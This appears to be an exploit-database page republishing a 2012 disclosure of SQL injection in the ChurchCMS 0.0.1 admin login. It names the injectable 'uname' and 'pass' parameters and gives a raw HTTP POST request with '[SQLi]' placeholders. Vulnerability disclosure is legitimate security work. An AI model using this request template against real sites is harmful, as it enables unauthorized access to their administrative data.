ChurchCMS 0.0.1 SQL Injection

2012.04.24
Credit: G13
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: ChurchCMS 0.0.1 'admin.php' Multiple SQLi # Date: 04/21/12 # Author: G13 # Twitter: @g13net # Software Link: http://sourceforge.net/projects/churchcms/?source=directory # Version: 0.0.1 # Category: webapps (php) # ##### Description ##### ChurchCMS is the software to place on your church's website that is easily managed, self-intuitive, yet expandable via our module library. Included features are: announcements, calendar, prayer requests manager, and help wanted manager. ##### Vulnerability ##### The admin.php page has multiple SQL injection vulnerabilities. Both the 'uname' and 'pass' parameters are vulnerable to SQL Injection. The vulnerability exists via the POST method. ##### Exploit ##### POST http://localhost/churchcms/admin.php?op=login HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:11.0) Gecko/20100101 Firefox/11.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Proxy-Connection: keep-alive Referer: http://localhost/churchcms/index.php Cookie: PHPSESSID=eq342ldrgqt4i5fshe6q2kvj17 Content-Type: application/x-www-form-urlencoded Content-length: 40 uname=[SQLi]&pass=[SQLi] ##### Vendor Notification ##### 04/21/12 - Vendor notified Per my disclosure policy, advisory is released. http://www.g13net.com/vuln-disc.txt

References:

http://sourceforge.net/projects/churchcms/?source=directory


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top